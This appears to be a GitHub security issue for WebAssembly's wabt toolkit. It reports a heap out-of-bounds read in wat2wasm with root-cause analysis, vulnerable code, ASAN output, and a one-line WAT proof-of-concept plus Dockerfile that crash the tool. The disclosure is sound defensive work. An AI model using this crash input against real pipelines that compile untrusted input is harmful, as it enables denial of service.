heap OOB read / SEGV in `BinaryWriter::WriteExpr`

## Description of the vulnerability and its impact

When `wat2wasm` processes a WAT file containing a `@custom` annotation inside a function
body (e.g. `@custom "a"`), `ParseCodeMetadataAnnotation` calls `name.remove_prefix(14)`
on the token text `"custom"` (6 bytes) without first checking that the name starts with
`"metadata.code."`. This violates the C++ precondition for `std::string_view::remove_prefix`,
producing a corrupted `string_view` with a pointer advanced 14 bytes past the token
allocation and a length of `0xFFFFFFFFFFFFFFF8` (unsigned wraparound). The corrupted
view is stored in a `CodeMetadataExpr` node and later used as a key in
`std::unordered_map<std::string_view, CodeMetadataSection>` inside `BinaryWriter::WriteExpr`,
causing the hash function to attempt a read of ~18 exabytes from an invalid address.

**Impact:** Deterministic crash (DoS) of any pipeline running `wat2wasm --enable-annotations`
on untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.

**First faulty condition:** `src/wast-parser.cc:2314` — `name.remove_prefix(sizeof("metadata.code.") - 1)` called without a prior `starts_with("metadata.code.")` guard.

**Crash site:** `src/binary-writer.cc:1189` — `BinaryWriter::WriteExpr` hashes the corrupted `string_view`.

---

## How to reproduce

```bash
echo '(module(func(@custom "a")))' > poc.wat
wat2wasm --enable-annotations poc.wat -o /dev/null
```

Crashes deterministically on current HEAD. No special heap layout or environment required.

**ASAN output:**

```
==10==ERROR: AddressSanitizer: SEGV on unknown address 0x603000010000
==10==The signal is caused by a READ memory access.
    #0 in std::_Hash_bytes(void const*, unsigned long, unsigned long)
    #1 in std::hash<std::string_view>::operator()
    #2 in std::unordered_map<std::string_view, ...>::operator[]
    #3 in wabt::(anonymous namespace)::BinaryWriter::WriteExpr
           /build/repo/src/binary-writer.cc:1189
    #4 in BinaryWriter::WriteExprList /build/repo/src/binary-writer.cc:1203
    #5 in BinaryWriter::WriteFunc    /build/repo/src/binary-writer.cc:1229
    #6 in BinaryWriter::WriteModule  /build/repo/src/binary-writer.cc:1737
    #7 in wabt::WriteBinaryModule    /build/repo/src/binary-writer.cc:1947
    #8 in ProgramMain                /build/repo/src/tools/wat2wasm.cc:152
```

For a full end-to-end reproducer this Dockerfile reproduces the issue:

```sh
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC

RUN apt-get update && apt-get install -y --no-install-recommends \
    git \
    cmake \
    ninja-build \
    clang-18 \
    llvm-18 \
    libclang-rt-18-dev \
    python3 \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*

# Clone wabt at HEAD (unpatched as of April 2026)
RUN git clone --depth=1 --recurse-submodules https://github.com/WebAssembly/wabt.git /build/repo \
    && cd /build/repo && git log -1 --oneline

# Build wat2wasm with ASAN using clang-18
RUN mkdir -p /build/repo/build && \
    cmake -S /build/repo -B /build/repo/build \
        -GNinja \
        -DCMAKE_BUILD_TYPE=Debug \
        -DCMAKE_C_COMPILER=clang-18 \
        -DCMAKE_CXX_COMPILER=clang++-18 \
        "-DCMAKE_C_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_CXX_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_EXE_LINKER_FLAGS=-fsanitize=address" \
        -DBUILD_TESTS=OFF \
    && ninja -C /build/repo/build wat2wasm

# Embed the PoC: 27-byte WAT text that triggers the bug
RUN echo '(module(func(@custom "a")))' > /build/poc.wat

# Show the vulnerable source region and then trigger the ASAN crash
CMD ["/bin/sh", "-c", \
    "echo '=== Vulnerable source (src/wast-parser.cc — ParseCodeMetadataAnnotation) ===' && \
     grep -n 'remove_prefix' /build/repo/src/wast-parser.cc | head -5 && \
     echo '' && \
     echo '=== ASAN crash ===' && \
     ASAN_OPTIONS='detect_leaks=0:print_stacktrace=1' \
     ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer-18) \
       /build/repo/build/wat2wasm --enable-annotations /build/poc.wat -o /dev/null 2>&1; exit 1"]
```

---

## Which WABT tools or library functions are affected

- **Tool:** `wat2wasm`
- **Vulnerable function:** `WastParser::ParseCodeMetadataAnnotation` — `src/wast-parser.cc:2314`
- **Crash site:** `BinaryWriter::WriteExpr` — `src/binary-writer.cc:1189`

---

## Which WebAssembly features must be enabled

**`--enable-annotations`** — the crash is only reachable when annotation parsing is
enabled. The `@custom` token is only accepted under this flag.

---

## Root Cause Analysis

### Background

wabt's `wat2wasm` tool compiles WebAssembly Text Format (WAT) to binary. The `--enable-annotations` flag activates support for WAT annotations — syntactic extensions of the form `(@name ...)`. One annotation type is `metadata.code.*`, used to attach custom metadata to instructions for toolchain pipelines. The annotation name must begin with the 14-byte prefix `"metadata.code."` for this feature to work correctly.

### Vulnerable Code

```cpp
// src/wast-parser.cc:2310 — WastParser::ParseCodeMetadataAnnotation
Result WastParser::ParseCodeMetadataAnnotation(ExprList* exprs) {
  WABT_TRACE(ParseCodeMetadataAnnotation);
  Token tk = Consume();
  std::string_view name = tk.text();
  name.remove_prefix(sizeof("metadata.code.") - 1);  // line 2314 — BUG
  std::string data_text;
  CHECK_RESULT(ParseQuotedText(&data_text, false));
  std::vector<uint8_t> data(data_text.begin(), data_text.end());
  exprs->push_back(std::make_unique<CodeMetadataExpr>(name, std::move(data)));
  EXPECT(Rpar);
  return Result::Ok;
}
```

**Plain explanation:** The function assumes that any annotation token reaching it begins with the 14-byte prefix `"metadata.code."` and strips that prefix unconditionally. When the token is `"custom"` (6 bytes), stripping 14 bytes is undefined behavior — it produces a `string_view` pointing past the end of the token buffer with a wrapped, near-maximal length.

**Precise explanation:** `sizeof("metadata.code.") - 1` is `14`. Calling `remove_prefix(14)` on a `string_view` of size 6 advances the internal `data_` pointer by 14 bytes (into adjacent heap memory or lexer state) and sets `size_` to `6 - 14 = -8`, which as `size_t` is `0xFFFFFFFFFFFFFFF8`. The resulting `string_view` is stored — without copying — into `CodeMetadataExpr::name` (a `std::string_view` member). At binary write time, `BinaryWriter::WriteExpr` uses this as a key in `std::unordered_map<std::string_view, CodeMetadataSection>`, which hashes the `string_view` by calling `std::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8)` — a read of ~18 exabytes from an invalid address, immediately caught by ASAN as a SEGV.

The root cause is the absence of a guard in `ParseCodeMetadataAnnotation` verifying that the annotation name actually starts with `"metadata.code."` before calling `remove_prefix`. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

heap OOB read / SEGV in `BinaryWriter::WriteExpr` #2742

Description of the vulnerability and its impact

How to reproduce

Which WABT tools or library functions are affected

Which WebAssembly features must be enabled

Root Cause Analysis

Background

Vulnerable Code

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

heap OOB read / SEGV in BinaryWriter::WriteExpr #2742

Description

Description of the vulnerability and its impact

How to reproduce

Which WABT tools or library functions are affected

Which WebAssembly features must be enabled

Root Cause Analysis

Background

Vulnerable Code

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions

heap OOB read / SEGV in `BinaryWriter::WriteExpr` #2742